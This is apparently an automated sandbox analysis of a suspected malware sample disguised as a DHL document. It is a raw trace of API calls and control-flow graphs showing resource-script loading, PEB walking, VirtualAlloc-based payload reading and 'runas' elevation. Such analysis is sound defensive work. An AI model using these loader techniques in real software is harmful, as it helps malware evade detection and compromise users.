97589->97626 97590 de2e1c 97631 dbe499 42 API calls 97590->97631 97598 de2e4d 97591->97598 97599 da31b9 97591->97599 97619 e0c161 97592->97619 97593->97604 97598->97580 97643 e00ad7 22 API calls 97598->97643 97605 da31c4 97599->97605 97606 da3253 97599->97606 97600 de2e8e 97600->97580 97600->97604 97601->97604 97607 de2dc6 SetFocus 97602->97607 97608 de2da7 97602->97608 97603 da3214 97627 da3c50 DeleteObject DestroyWindow 97603->97627 97605->97580 97632 da30f2 Shell_NotifyIconW ___scrt_fastfail 97605->97632 97628 da326f 44 API calls ___scrt_fastfail 97606->97628 97607->97604 97608->97605 97612 de2db0 97608->97612 97629 da18e2 10 API calls 97612->97629 97613->97580 97614 da3263 97614->97604 97617 de2e41 97633 da3837 97617->97633 97620 e0c276 97619->97620 97621 e0c179 ___scrt_fastfail 97619->97621 97620->97604 97645 da3923 97621->97645 97623 e0c25f KillTimer SetTimer 97623->97620 97624 e0c1a0 97624->97623 97625 e0c251 Shell_NotifyIconW 97624->97625 97625->97623 97626->97603 97627->97604 97628->97614 97629->97604 97630->97590 97631->97605 97632->97617 97634 da3862 ___scrt_fastfail 97633->97634 97667 da4212 97634->97667 97638 da38e8 97639 de3386 Shell_NotifyIconW 97638->97639 97640 da3906 Shell_NotifyIconW 97638->97640 97641 da3923 24 API calls 97640->97641 97642 da391c 97641->97642 97642->97613 97643->97613 97644->97600 97646 da393f 97645->97646 97647 da3a13 97645->97647 97648 da6270 22 API calls 97646->97648 97647->97624 97649 da394d 97648->97649 97650 da395a 97649->97650 97651 de3393 LoadStringW 97649->97651 97652 da6b57 22 API calls 97650->97652 97653 de33ad 97651->97653 97654 da396f 97652->97654 97657 daa8c7 22 API calls 97653->97657 97662 da3994 ___scrt_fastfail 97653->97662 97655 da397c 97654->97655 97656 de33c9 97654->97656 97655->97653 97658 da3986 97655->97658 97659 da6350 22 API calls 97656->97659 97657->97662 97660 da6350 22 API calls 97658->97660 97661 de33d7 97659->97661 97660->97662 97661->97662 97663 da33c6 22 API calls 97661->97663 97664 da39f9 Shell_NotifyIconW 97662->97664 97665 de33f9 97663->97665 97664->97647 97666 da33c6 22 API calls 97665->97666 97666->97662 97668 de35a4 97667->97668 97669 da38b7 97667->97669 97668->97669 97670 de35ad DestroyIcon 97668->97670 97669->97638 97671 e0c874 42 API calls _strftime 97669->97671 97670->97669 97671->97638 97672 da2e37 97673 daa961 22 API calls 97672->97673 97674 da2e4d 97673->97674 97751 da4ae3 97674->97751 97676 da2e6b 97677 da3a5a 24 API calls 97676->97677 97678 da2e7f 97677->97678 97679 da9cb3 22 API calls 97678->97679 97680 da2e8c 97679->97680 97681 da4ecb 94 API calls 97680->97681 97682 da2ea5 97681->97682 97683 da2ead 97682->97683 97684 de2cb0 97682->97684 97687 daa8c7 22 API calls 97683->97687 97781 e12cf9 97684->97781 97686 de2cc3 97688 de2ccf 97686->97688 97690 da4f39 68 API calls 97686->97690 97689 da2ec3 97687->97689 97692 da4f39 68 API calls 97688->97692 97765 da6f88 22 API calls 97689->97765 97690->97688 97694 de2ce5 97692->97694 97693 da2ecf 97695 da9cb3 22 API calls 97693->97695 97807 da3084 22 API calls 97694->97807 97696 da2edc 97695->97696 97766 daa81b 41 API calls 97696->97766 97699 da2eec 97701 da9cb3 22 API calls 97699->97701 97700 de2d02 97808 da3084 22 API calls 97700->97808 97702 da2f12 97701->97702 97767 daa81b 41 API calls 97702->97767 97705 de2d1e 97706 da3a5a 24 API calls 97705->97706 97707 de2d44 97706->97707 97809 da3084 22 API calls 97707->97809 97708 da2f21 97711 daa961 22 API calls 97708->97711 97710 de2d50 97712 daa8c7 22 API calls 97710->97712 97713 da2f3f 97711->97713 97714 de2d5e 97712->97714 97768 da3084 22 API calls 97713->97768 97810 da3084 22 API calls 97714->97810 97717 da2f4b 97769 dc4a28 40 API calls 3 library calls 97717->97769 97718 de2d6d 97722 daa8c7 22 API calls 97718->97722 97720 da2f59 97720->97694 97721 da2f63 97720->97721 97770 dc4a28 40 API calls 3 library calls 97721->97770 97725 de2d83 97722->97725 97724 da2f6e 97724->97700 97726 da2f78 97724->97726 97811 da3084 22 API calls 97725->97811 97771 dc4a28 40 API calls 3 library calls 97726->97771 97729 de2d90 97730 da2f83 97730->97705 97731 da2f8d 97730->97731 97772 dc4a28 40 API calls 3 library calls 97731->97772 97733 da2f98 97734 da2fdc 97733->97734 97773 da3084 22 API calls 97733->97773 97734->97718 97735 da2fe8 97734->97735 97735->97729 97775 da63eb 22 API calls 97735->97775 97738 da2fbf 97740 daa8c7 22 API calls 97738->97740 97739 da2ff8 97776 da6a50 22 API calls 97739->97776 97742 da2fcd 97740->97742 97774 da3084 22 API calls 97742->97774 97743 da3006 97777 da70b0 23 API calls 97743->97777 97748 da3021 97749 da3065 97748->97749 97778 da6f88 22 API calls 97748->97778 97779 da70b0 23 API calls 97748->97779 97780 da3084 22 API calls 97748->97780 97752 da4af0 __wsopen_s 97751->97752 97753 da6b57 22 API calls 97752->97753 97754 da4b22 97752->97754 97753->97754 97755 da4c6d 22 API calls 97754->97755 97759 da4b58 97754->97759 97755->97754 97756 da9cb3 22 API calls 97758 da4c52 97756->97758 97757 da9cb3 22 API calls 97757->97759 97760 da515f 22 API calls 97758->97760 97759->97757 97761 da515f 22 API calls 97759->97761 97763 da4c29 97759->97763 97764 da4c6d 22 API calls 97759->97764 97762 da4c5e 97760->97762 97761->97759 97762->97676 97763->97756 97763->97762 97764->97759 97765->97693 97766->97699 97767->97708 97768->97717 97769->97720 97770->97724 97771->97730 97772->97733 97773->97738 97774->97734 97775->97739 97776->97743 97777->97748 97778->97748 97779->97748 97780->97748 97782 e12d15 97781->97782 97783 da511f 64 API calls 97782->97783 97784 e12d29 97783->97784 97785 e12e66 75 API calls 97784->97785 97786 e12d3b 97785->97786 97787 da50f5 40 API calls 97786->97787 97805 e12d3f 97786->97805 97788 e12d56 97787->97788 97789 da50f5 40 API calls 97788->97789 97790 e12d66 97789->97790 97791 da50f5 40 API calls 97790->97791 97792 e12d81 97791->97792 97793 da50f5 40 API calls 97792->97793 97794 e12d9c 97793->97794 97795 da511f 64 API calls 97794->97795 97796 e12db3 97795->97796 97797 dcea0c ___std_exception_copy 21 API calls 97796->97797 97798 e12dba 97797->97798 97799 dcea0c ___std_exception_copy 21 API calls 97798->97799 97800 e12dc4 97799->97800 97801 da50f5 40 API calls 97800->97801 97802 e12dd8 97801->97802 97803 e128fe 27 API calls 97802->97803 97804 e12dee 97803->97804 97804->97805 97812 e122ce 79 API calls 97804->97812 97805->97686 97807->97700 97808->97705 97809->97710 97810->97718 97811->97729 97812->97805 97813 fef553 97814 fef558 97813->97814 97822 fecbf8 97814->97822 97816 fef564 97817 fef618 97816->97817 97818 fef582 97816->97818 97838 fefec8 9 API calls 97817->97838 97825 fef228 97818->97825 97821 fef5ff 97839 ff00d8 GetPEB 97822->97839 97824 fed283 97824->97816 97826 fecbf8 GetPEB 97825->97826 97835 fef2c7 97826->97835 97828 fef2f8 CreateFileW 97830 fef305 97828->97830 97828->97835 97829 fef321 VirtualAlloc 97829->97830 97831 fef342 ReadFile 97829->97831 97833 fef514 VirtualFree 97830->97833 97834 fef522 97830->97834 97831->97830 97832 fef360 VirtualAlloc 97831->97832 97832->97830 97832->97835 97833->97834 97834->97821 97835->97829 97835->97830 97836 fef428 CloseHandle 97835->97836 97837 fef438 VirtualFree 97835->97837 97841 ff0138 GetPEB 97835->97841 97836->97835 97837->97835 97838->97821 97840 ff0102 97839->97840 97840->97824 97842 ff0162 97841->97842 97842->97828 97843 feefa8 97844 fecbf8 GetPEB 97843->97844 97845 fef0a6 97844->97845 97857 feee98 97845->97857 97847 fef0cf CreateFileW 97849 fef121 97847->97849 97850 fef126 97847->97850 97850->97849 97851 fef13d VirtualAlloc 97850->97851 97851->97849 97852 fef15b ReadFile 97851->97852 97852->97849 97853 fef176 97852->97853 97854 fede98 13 API calls 97853->97854 97855 fef1a9 97854->97855 97856 fef1cc ExitProcess 97855->97856 97856->97849 97858 feeea1 Sleep 97857->97858 97859 feeeaf 97858->97859 97860 da1cad SystemParametersInfoW 97861 da2de3 97862 da2df0 __wsopen_s 97861->97862 97863 da2e09 97862->97863 97864 de2c2b ___scrt_fastfail 97862->97864 97865 da3aa2 23 API calls 97863->97865 97866 de2c47 GetOpenFileNameW 97864->97866 97867 da2e12 97865->97867 97868 de2c96 97866->97868 97877 da2da5 97867->97877 97870 da6b57 22 API calls 97868->97870 97872 de2cab 97870->97872 97872->97872 97874 da2e27 97895 da44a8 97874->97895 97878 de1f50 __wsopen_s 97877->97878 97879 da2db2 GetLongPathNameW 97878->97879 97880 da6b57 22 API calls 97879->97880 97881 da2dda 97880->97881 97882 da3598 97881->97882 97883 daa961 22 API calls 97882->97883 97884 da35aa 97883->97884 97885 da3aa2 23 API calls 97884->97885 97886 da35b5 97885->97886 97887 da35c0 97886->97887 97892 de32eb 97886->97892 97889 da515f 22 API calls 97887->97889 97890 da35cc 97889->97890 97925 da35f3 97890->97925 97893 de330d 97892->97893 97931 dbce60 41 API calls 97892->97931 97894 da35df 97894->97874 97896 da4ecb 94 API calls 97895->97896 97897 da44cd 97896->97897 97898 de3833 97897->97898 97899 da4ecb 94 API calls 97897->97899 97900 e12cf9 80 API calls 97898->97900 97901 da44e1 97899->97901 97902 de3848 97900->97902 97901->97898 97903 da44e9 97901->97903 97904 de384c 97902->97904 97905 de3869 97902->97905 97907 de3854 97903->97907 97908 da44f5 97903->97908 97909 da4f39 68 API calls 97904->97909 97906 dbfe0b 22 API calls 97905->97906 97918 de38ae 97906->97918 97948 e0da5a 82 API calls 97907->97948 97947 da940c 136 API calls 2 library calls 97908->97947 97909->97907 97912 da2e31 97913 de3862 97913->97905 97914 de3a5f 97920 de3a67 97914->97920 97915 da4f39 68 API calls 97915->97920 97916 daa4a1 22 API calls 97916->97918 97918->97914 97918->97916 97918->97920 97922 da9cb3 22 API calls 97918->97922 97932 e0967e 97918->97932 97935 e10b5a 97918->97935 97941 da3ff7 97918->97941 97949 e095ad 42 API calls _wcslen 97918->97949 97920->97915 97950 e0989b 82 API calls __wsopen_s 97920->97950 97922->97918 97926 da3605 97925->97926 97930 da3624 __fread_nolock 97925->97930 97928 dbfe0b 22 API calls 97926->97928 97927 dbfddb 22 API calls 97929 da363b 97927->97929 97928->97930 97929->97894 97930->97927 97931->97892 97933 dbfe0b 22 API calls 97932->97933 97934 e096ae __fread_nolock 97933->97934 97934->97918 97934->97934 97936 e10b65 97935->97936 97937 dbfddb 22 API calls 97936->97937 97938 e10b7c 97937->97938 97939 da9cb3 22 API calls 97938->97939 97940 e10b87 97939->97940 97940->97918 97942 da400a 97941->97942 97945 da40ae 97941->97945 97943 dbfe0b 22 API calls 97942->97943 97946 da403c 97942->97946 97943->97946 97944 dbfddb 22 API calls 97944->97946 97945->97918 97946->97944 97946->97945 97947->97912 97948->97913 97949->97918 97950->97920 97951 de2ba5 97952 de2baf 97951->97952 97953 da2b25 97951->97953 97955 da3a5a 24 API calls 97952->97955 97979 da2b83 7 API calls 97953->97979 97957 de2bb8 97955->97957 97959 da9cb3 22 API calls 97957->97959 97961 de2bc6 97959->97961 97960 da2b2f 97965 da3837 49 API calls 97960->97965 97967 da2b44 97960->97967 97962 de2bce 97961->97962 97963 de2bf5 97961->97963 97966 da33c6 22 API calls 97962->97966 97964 da33c6 22 API calls 97963->97964 97969 de2bf1 GetForegroundWindow ShellExecuteW 97964->97969 97965->97967 97968 de2bd9 97966->97968 97970 da2b5f 97967->97970 97983 da30f2 Shell_NotifyIconW ___scrt_fastfail 97967->97983 97971 da6350 22 API calls 97968->97971 97975 de2c26 97969->97975 97977 da2b66 SetCurrentDirectoryW 97970->97977 97974 de2be7 97971->97974 97976 da33c6 22 API calls 97974->97976 97975->97970 97976->97969 97978 da2b7a 97977->97978 97984 da2cd4 7 API calls 97979->97984 97981 da2b2a 97982 da2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97981->97982 97982->97960 97983->97970 97984->97981 97985 da1044 97990 da10f3 97985->97990 97987 da104a 98026 dc00a3 29 API calls __onexit 97987->98026 97989 da1054 98027 da1398 97990->98027 97994 da116a 97995 daa961 22 API calls 97994->97995 97996 da1174 97995->97996 97997 daa961 22 API calls 97996->97997 97998 da117e 97997->97998 97999 daa961 22 API calls 97998->97999 98000 da1188 97999->98000 98001 daa961 22 API calls 98000->98001 98002 da11c6 98001->98002 98003 daa961 22 API calls 98002->98003 98004 da1292 98003->98004 98037 da171c 98004->98037 98008 da12c4 98009 daa961 22 API calls 98008->98009 98010 da12ce 98009->98010 98011 db1940 9 API calls 98010->98011 98012 da12f9 98011->98012 98058 da1aab 98012->98058 98014 da1315 98015 da1325 GetStdHandle 98014->98015 98016 da137a 98015->98016 98017 de2485 98015->98017 98021 da1387 OleInitialize 98016->98021 98017->98016 98018 de248e 98017->98018 98019 dbfddb 22 API calls 98018->98019 98020 de2495 98019->98020 98065 e1011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98020->98065 98021->97987 98023 de249e 98066 e10944 CreateThread 98023->98066 98025 de24aa CloseHandle 98025->98016 98026->97989 98067 da13f1 98027->98067 98030 da13f1 22 API calls 98031 da13d0 98030->98031 98032 daa961 22 API calls 98031->98032 98033 da13dc 98032->98033 98034 da6b57 22 API calls 98033->98034 98035 da1129 98034->98035 98036 da1bc3 6 API calls 98035->98036 98036->97994 98038 daa961 22 API calls 98037->98038 98039 da172c 98038->98039 98040 daa961 22 API calls 98039->98040 98041 da1734 98040->98041 98042 daa961 22 API calls 98041->98042 98043 da174f 98042->98043 98044 dbfddb 22 API calls 98043->98044 98045 da129c 98044->98045 98046 da1b4a 98045->98046 98047 da1b58 98046->98047 98048 daa961 22 API calls 98047->98048 98049 da1b63 98048->98049 98050 daa961 22 API calls 98049->98050 98051 da1b6e 98050->98051 98052 daa961 22 API calls 98051->98052 98053 da1b79 98052->98053 98054 daa961 22 API calls 98053->98054 98055 da1b84 98054->98055 98056 dbfddb 22 API calls 98055->98056 98057 da1b96 RegisterWindowMessageW 98056->98057 98057->98008 98059 da1abb 98058->98059 98060 de272d 98058->98060 98061 dbfddb 22 API calls 98059->98061 98074 e13209 23 API calls 98060->98074 98063 da1ac3 98061->98063 98063->98014 98064 de2738 98065->98023 98066->98025 98075 e1092a 28 API calls 98066->98075 98068 daa961 22 API calls 98067->98068 98069 da13fc 98068->98069 98070 daa961 22 API calls 98069->98070 98071 da1404 98070->98071 98072 daa961 22 API calls 98071->98072 98073 da13c6 98072->98073 98073->98030 98074->98064 98076 df3a41 98080 e110c0 98076->98080 98078 df3a4c 98079 e110c0 53 API calls 98078->98079 98079->98078 98081 e110fa 98080->98081 98086 e110cd 98080->98086 98081->98078 98082 e110fc 98092 dbfa11 53 API calls 98082->98092 98084 e11101 98085 da7510 53 API calls 98084->98085 98087 e11108 98085->98087 98086->98081 98086->98082 98086->98084 98089 e110f4 98086->98089 98088 da6350 22 API calls 98087->98088 98088->98081 98091 dab270 39 API calls 98089->98091 98091->98081 98092->98084 98093 df2a00 98108 dad7b0 messages 98093->98108 98094 dadb11 PeekMessageW 98094->98108 98095 dad807 GetInputState 98095->98094 98095->98108 98096 df1cbe TranslateAcceleratorW 98096->98108 98098 dadb8f PeekMessageW 98098->98108 98099 dada04 timeGetTime 98099->98108 98100 dadb73 TranslateMessage DispatchMessageW 98100->98098 98101 dadbaf Sleep 98119 dadbc0 98101->98119 98102 df2b74 Sleep 98102->98119 98103 dbe551 timeGetTime 98103->98119 98104 df1dda timeGetTime 98154 dbe300 23 API calls 98104->98154 98107 df2c0b GetExitCodeProcess 98112 df2c37 CloseHandle 98107->98112 98113 df2c21 WaitForSingleObject 98107->98113 98108->98094 98108->98095 98108->98096 98108->98098 98108->98099 98108->98100 98108->98101 98108->98102 98108->98104 98111 dad9d5 98108->98111 98120 daec40 235 API calls 98108->98120 98122 db1310 235 API calls 98108->98122 98123 dabf40 235 API calls 98108->98123 98125 dadfd0 98108->98125 98148 dbedf6 98108->98148 98153 dadd50 235 API calls 98108->98153 98155 e13a2a 23 API calls 98108->98155 98156 e1359c 82 API calls __wsopen_s 98108->98156 98109 e329bf GetForegroundWindow 98109->98119 98112->98119 98113->98108 98113->98112 98114 df2a31 98114->98111 98115 df2ca9 Sleep 98115->98108 98119->98103 98119->98107 98119->98108 98119->98109 98119->98111 98119->98114 98119->98115 98157 e25658 23 API calls 98119->98157 98158 e0e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98119->98158 98159 e0d4dc 47 API calls 98119->98159 98120->98108 98122->98108 98123->98108 98126 dae010 98125->98126 98136 dae0dc messages 98126->98136 98162 dc0242 5 API calls __Init_thread_wait 98126->98162 98129 df2fca 98131 daa961 22 API calls 98129->98131 98129->98136 98130 daa961 22 API calls 98130->98136 98134 df2fe4 98131->98134 98163 dc00a3 29 API calls __onexit 98134->98163 98136->98130 98140 e1359c 82 API calls 98136->98140 98142 daa8c7 22 API calls 98136->98142 98143 daec40 235 API calls 98136->98143 98144 db04f0 22 API calls 98136->98144 98145 dae3e1 98136->98145 98160 daa81b 41 API calls 98136->98160 98161 dba308 235 API calls 98136->98161 98165 dc0242 5 API calls __Init_thread_wait 98136->98165 98166 dc00a3 29 API calls __onexit 98136->98166 98167 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98136->98167 98168 e247d4 235 API calls 98136->98168 98169 e268c1 235 API calls 98136->98169 98138 df2fee 98164 dc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98138->98164 98140->98136 98142->98136 98143->98136 98144->98136 98145->98108 98150 dbee09 98148->98150 98151 dbee12 98148->98151 98149 dbee36 IsDialogMessageW 98149->98150 98149->98151 98150->98108 98151->98149 98151->98150 98152 dfefaf GetClassLongW 98151->98152 98152->98149 98152->98151 98153->98108 98154->98108 98155->98108 98156->98108 98157->98119 98158->98119 98159->98119 98160->98136 98161->98136 98162->98129 98163->98138 98164->98136 98165->98136 98166->98136 98167->98136 98168->98136 98169->98136 98170 dd8402 98175 dd81be 98170->98175 98173 dd842a 98180 dd81ef try_get_first_available_module 98175->98180 98177 dd83ee 98194 dd27ec 26 API calls pre_c_initialization 98177->98194 98179 dd8343 98179->98173 98187 de0984 98179->98187 98186 dd8338 98180->98186 98190 dc8e0b 40 API calls 2 library calls 98180->98190 98182 dd838c 98182->98186 98191 dc8e0b 40 API calls 2 library calls 98182->98191 98184 dd83ab 98184->98186 98192 dc8e0b 40 API calls 2 library calls 98184->98192 98186->98179 98193 dcf2d9 20 API calls __dosmaperr 98186->98193 98195 de0081 98187->98195 98189 de099f 98189->98173 98190->98182 98191->98184 98192->98186 98193->98177 98194->98179 98197 de008d __FrameHandler3::FrameUnwindToState 98195->98197 98196 de009b 98252 dcf2d9 20 API calls __dosmaperr 98196->98252 98197->98196 98199 de00d4 98197->98199 98206 de065b 98199->98206 98200 de00a0 98253 dd27ec 26 API calls pre_c_initialization 98200->98253 98205 de00aa __wsopen_s 98205->98189 98207 de0678 98206->98207 98208 de068d 98207->98208 98209 de06a6 98207->98209 98269 dcf2c6 20 API calls __dosmaperr 98208->98269 98255 dd5221 98209->98255 98212 de06ab 98213 de06cb 98212->98213 98214 de06b4 98212->98214 98268 de039a CreateFileW 98213->98268 98271 dcf2c6 20 API calls __dosmaperr 98214->98271 98218 de00f8 98254 de0121 LeaveCriticalSection __wsopen_s 98218->98254 98219 de06b9 98272 dcf2d9 20 API calls __dosmaperr 98219->98272 98220 de0781 GetFileType 98223 de078c GetLastError 98220->98223 98224 de07d3 98220->98224 98222 de0756 GetLastError 98274 dcf2a3 20 API calls __dosmaperr 98222->98274 98275 dcf2a3 20 API calls __dosmaperr 98223->98275 98277 dd516a 21 API calls 2 library calls 98224->98277 98225 de0692 98270 dcf2d9 20 API calls __dosmaperr 98225->98270 98226 de0704 98226->98220 98226->98222 98273 de039a CreateFileW 98226->98273 98230 de079a CloseHandle 98230->98225 98233 de07c3 98230->98233 98232 de0749 98232->98220 98232->98222 98276 dcf2d9 20 API calls __dosmaperr 98233->98276 98234 de07f4 98236 de0840 98234->98236 98278 de05ab 72 API calls 3 library calls 98234->98278 98241 de086d 98236->98241 98279 de014d 72 API calls 4 library calls 98236->98279 98237 de07c8 98237->98225 98240 de0866 98240->98241 98242 de087e 98240->98242 98243 dd86ae __wsopen_s 29 API calls 98241->98243 98242->98218 98244 de08fc CloseHandle 98242->98244 98243->98218 98280 de039a CreateFileW 98244->98280 98246 de0927 98247 de095d 98246->98247 98248 de0931 GetLastError 98246->98248 98247->98218 98281 dcf2a3 20 API calls __dosmaperr 98248->98281 98250 de093d 98282 dd5333 21 API calls 2 library calls 98250->98282 98252->98200 98253->98205 98254->98205 98256 dd522d __FrameHandler3::FrameUnwindToState 98255->98256 98283 dd2f5e EnterCriticalSection 98256->98283 98258 dd5234 98260 dd5259 98258->98260 98264 dd52c7 EnterCriticalSection 98258->98264 98265 dd527b 98258->98265 98262 dd5000 __wsopen_s 21 API calls 98260->98262 98261 dd52a4 __wsopen_s 98261->98212 98263 dd525e 98262->98263 98263->98265 98287 dd5147 EnterCriticalSection 98263->98287 98264->98265 98266 dd52d4 LeaveCriticalSection 98264->98266 98284 dd532a 98265->98284 98266->98258 98268->98226 98269->98225 98270->98218 98271->98219 98272->98225 98273->98232 98274->98225 98275->98230 98276->98237 98277->98234 98278->98236 98279->98240 98280->98246 98281->98250 98282->98247 98283->98258 98288 dd2fa6 LeaveCriticalSection 98284->98288 98286 dd5331 98286->98261 98287->98265 98288->98286

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 234 da42de-da434d call daa961 GetVersionExW call da6b57 239 de3617-de362a 234->239 240 da4353 234->240 242 de362b-de362f 239->242 241 da4355-da4357 240->241 243 da435d-da43bc call da93b2 call da37a0 241->243 244 de3656 241->244 245 de3632-de363e 242->245 246 de3631 242->246 263 de37df-de37e6 243->263 264 da43c2-da43c4 243->264 250 de365d-de3660 244->250 245->242 247 de3640-de3642 245->247 246->245 247->241 249 de3648-de364f 247->249 249->239 252 de3651 249->252 253 da441b-da4435 GetCurrentProcess IsWow64Process 250->253 254 de3666-de36a8 250->254 252->244 256 da4437 253->256 257 da4494-da449a 253->257 254->253 258 de36ae-de36b1 254->258 260 da443d-da4449 256->260 257->260 261 de36db-de36e5 258->261 262 de36b3-de36bd 258->262 265 da444f-da445e LoadLibraryA 260->265 266 de3824-de3828 GetSystemInfo 260->266 270 de36f8-de3702 261->270 271 de36e7-de36f3 261->271 267 de36bf-de36c5 262->267 268 de36ca-de36d6 262->268 272 de37e8 263->272 273 de3806-de3809 263->273 264->250 269 da43ca-da43dd 264->269 278 da449c-da44a6 GetSystemInfo 265->278 279 da4460-da446e GetProcAddress 265->279 267->253 268->253 280 de3726-de372f 269->280 281 da43e3-da43e5 269->281 274 de3704-de3710 270->274 275 de3715-de3721 270->275 271->253 282 de37ee 272->282 276 de380b-de381a 273->276 277 de37f4-de37fc 273->277 274->253 275->253 276->282 285 de381c-de3822 276->285 277->273 287 da4476-da4478 278->287 279->278 286 da4470-da4474 GetNativeSystemInfo 279->286 283 de373c-de3748 280->283 284 de3731-de3737 280->284 288 da43eb-da43ee 281->288 289 de374d-de3762 281->289 282->277 283->253 284->253 285->277 286->287 294 da447a-da447b FreeLibrary 287->294 295 da4481-da4493 287->295 290 da43f4-da440f 288->290 291 de3791-de3794 288->291 292 de376f-de377b 289->292 293 de3764-de376a 289->293 296 de3780-de378c 290->296 297 da4415 290->297 291->253 298 de379a-de37c1 291->298 292->253 293->253 294->295 296->253 297->253 299 de37ce-de37da 298->299 300 de37c3-de37c9 298->300 299->253 300->253
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00DA430D
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • GetCurrentProcess.KERNEL32(?,00E3CB64,00000000,?,?), ref: 00DA4422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00DA4429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DA4454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DA4466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00DA4474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DA447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00DA44A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                      • API String ID: 3290436268-3101561225
                                                                                      • Opcode ID: 345a2752391ec3c1568dfe8c7da44003a2c2e69d402b42106b5705ba17af7c05
                                                                                      • Instruction ID: 68a3dddd1bebca4bcd991417e1230da071a3fbec98ac3952d4e2c8dd8b10b732
                                                                                      • Opcode Fuzzy Hash: 345a2752391ec3c1568dfe8c7da44003a2c2e69d402b42106b5705ba17af7c05
                                                                                      • Instruction Fuzzy Hash: E4A1957191A3C0FFC711DB7F7C451A57FA46B66300B1A58E9E08DB7AA1D2A0858CCB71

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1063 da42a2-da42ba CreateStreamOnHGlobal 1064 da42da-da42dd 1063->1064 1065 da42bc-da42d3 FindResourceExW 1063->1065 1066 da42d9 1065->1066 1067 de35ba-de35c9 LoadResource 1065->1067 1066->1064 1067->1066 1068 de35cf-de35dd SizeofResource 1067->1068 1068->1066 1069 de35e3-de35ee LockResource 1068->1069 1069->1066 1070 de35f4-de3612 1069->1070 1070->1066
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00DA50AA,?,?,00000000,00000000), ref: 00DA42B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DA50AA,?,?,00000000,00000000), ref: 00DA42C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00DA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DA4F20), ref: 00DE35BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00DA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DA4F20), ref: 00DE35D3
                                                                                      • LockResource.KERNEL32(00DA50AA,?,?,00DA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00DA4F20,?), ref: 00DE35E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: 81cc55a1ff8fda51e5dca5dc3bd7e6deb3a8d1ea3e806a25a226b36db364006b
                                                                                      • Instruction ID: cdd69f274272b7d61d4adf7a78a65c5f886db505d2cff57c6af1a9093634dda6
                                                                                      • Opcode Fuzzy Hash: 81cc55a1ff8fda51e5dca5dc3bd7e6deb3a8d1ea3e806a25a226b36db364006b
                                                                                      • Instruction Fuzzy Hash: 56117C72241704BFD7218B66DC4CF277BB9EBC6B51F244169B502A6260DBB1D8048730

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA2B6B
                                                                                        • Part of subcall function 00DA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E71418,?,00DA2E7F,?,?,?,00000000), ref: 00DA3A78
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00E62224), ref: 00DE2C10
